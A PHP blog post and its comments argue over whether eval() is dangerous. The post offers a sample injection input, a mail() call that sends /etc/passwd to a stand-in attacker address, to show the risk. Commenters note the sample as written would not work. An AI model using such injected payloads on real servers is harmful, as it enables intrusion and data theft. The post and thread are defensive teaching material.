PHP eval is evil

JSON creator Douglas Crockford more than once pointed out that: in JavaScript, eval is evil. Well in PHP, eval is also almost always evil (though some people say it can be useful in a few limited cases). I personally have no guts to use it. Allowing any user-supplied data to go into an eval( ) call is asking to be hacked.

eval( ) has aliases. Do not use the /e option with preg_replace( ), the preg_replace( ) function with the /e option also calls eval( ) on PHP code, especially if you use any user-entered data in the calls.

So what does eval do? In eval ( string $code_str ), eval evaluates the string given in code_str as PHP code. Imagine you get a form username input field value using eval($_POST['username']), if the hacker type the following value in the input field: mail("hacker@somewhere.com", "Some passwords", '/bin/cat /etc/passwd'). You will be sending your server password to the hacker.

So don’t use eval unless you are suicidal. ;)

Be Sociable, Share!

About Shi Chuan

I am a web developer.
This entry was posted in PHP Core and tagged , . Bookmark the permalink.

18 Responses to PHP eval is evil

  1. Ross says:

    I find eval very helpful in varible setting examples, for example:

    eval(‘$this->debug =’ . (IS_PHP4 ? ‘&’ : ”) . ‘ new stdClass();’);

    The only cases where eval is “evil” are whereyou’re inputting user data into eval – but you should be validating and sanitising any user input anyway.

  2. admin says:

    Hi, Ross

    in your case, it provides convenience and really helpful. What I mentioned in my post was more about the possible problems eval causes.

    really appreciate your opinion. :)

  3. Matt says:

    In your first paragraph you’re assuming that any use of eval() is evil? You say that allowing any user-supplied data to go into eval() is asking to be hacked; that’s not the same thing as just using eval().

    I was using eval() today (though, admittedly, I am strongly against eval() too) but none of the data in it is user-supplied.

  4. max says:

    “if the hacker type the following value in the input field”

    he get nothing with your example except an email with ‘/bin/cat /etc/passwd’ text.

  5. Rob says:

    I too use eval() and find it is a very useful and powerful function.

    It’s only ‘evil’ to the idiots who don’t use correct input validation and allow any content to be eval()’d.

    If you design your product right, you shouldn’t have any problems. Avoiding eval, for me. Just isn’t a solution.

    Also, max is right.

  6. Aaron says:

    Max is right, and I agree with Rob.

    Even if they did get the contents of your passwd file, it actually only contains information on user’s, like id, username, group. No password, the password is in the Shadow file…

  7. Teo Iliev says:

    Uou just have to always escape the eval statement.

    eval(“echo \$variable;”);

    You can also use eval to return some reference or value:

    $result_variable = eval(“return \$static”.$dynamic.”;”);

  8. Mike says:

    Eval can be a useful function, however it can also be an open invitation for malicious code. In most cases, eval can and should be avoided, especially when validating user inputted data.

    Eval, imho, is best used as a limited method for interpreting templated data (ie Smarty), but again anytime you give users the power of the programmer bad things can happen.

    Just a word of caution to all my fellow programmers… no one writes code using eval with the idea that it can be manipulated… so just be very careful how you use it.

    – Mike :o)

  9. kaizoku says:

    /etc/passwd is useless anyways.

  10. Julius Domingo says:

    eval() is used in php frameworks.
    Specifically, it can be used in declaring dynamic variables.
    ex.
    $varname=”myvar”;
    eval(“\${$myvar}=12345;”);

  11. I mostly use eval to help obfuscating…

    I know, it doesn’t really help obfuscating but I’ve made a program which nests every eval by eval by eval with some string “encryptions” which defer randomly to help keep skids and possible paying customers (LOL) away from my sourcecode (of course assuming I sold them the system without rights to source).

    It can be broken, but it really helps cut down on piracy. There is some server time going into decoding each time but for some scripts a few milliseconds doesn’t matter.

  12. Pingback: How do I execute PHP that is stored in a MySQL database? - Programmers Goodies

  13. Kevin says:

    Even if they DID obtain the contents of /etc/passwd, it’s not like it’d matter. /etc/shadow is what they would really want and you’d have to run your PHP script as root or as user in the shadow group. Which, my friends, is pure suicidal.

  14. Code Overload says:

    There are many cases where you can write code to prevent the use of eval().

    Specifically, it can be used in declaring dynamic variables.
    ex.
    $varname=”myvar”;
    eval(“\${$myvar}=12345;”);

    Have you tried:
    $$varname=12345;
    Look up variable variables. They work wonders.

    I find eval very helpful in varible setting examples, for example:

    eval(‘$this->debug =’ . (IS_PHP4 ? ‘&’ : ”) . ‘ new stdClass();’);

    I must say, you should NEVER couple your code so tightly that you need to eval() it.
    Try this, it not only adds structure, but allows you to keep separate codebases.

    if(IS_PHP4) include 'php4_codebase.php';
    else include 'php5_codebase.php';

    99% of cases that you’d need to use eval() you can avoid with a little bit of logic and a quick dose of documentation.

  15. Jim says:

    in my website /public_html/ i found a extra php file,name a.php

    and i open this a.php by dreamwear, it’s show

    can someone tell me what’ this mean.

    my website was direct to other website that was not belong to me.

    how can i prevent this.

  16. arnold mercado says:

    use eval only if you have a specific purpose but don’t abuse using eval. there are many ways you can do without using eval. because eval gives other programmers to modify externally your system without having intentional. putting eval in your code is giving your system a backdoor.

  17. Bas Vijfwinkel says:

    [quote]
    because eval gives other programmers to modify externally your system without having intentional. putting eval in your code is giving your system a backdoor.
    [/quote]
    Nonsense.
    If you properly design your code, then there should be no problem with using eval at all.
    Just make sure that you know exactly what is going into eval.
    Eval can be very helpful is you have very dynamic systems and enables you as a programmer to write very compact code that would otherwise need very complex structures.

    • Ez says:

      Had to chime in here, been researching the use of eval() for a dynamic solution in eCommerce. We want to give additional functionality to our customers (store owners) allowing them configure their own rules for handling distribution. i.e. order > 70 do x, order < 50 do y etc.

      A valid use of eval(); (If done correctly).

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>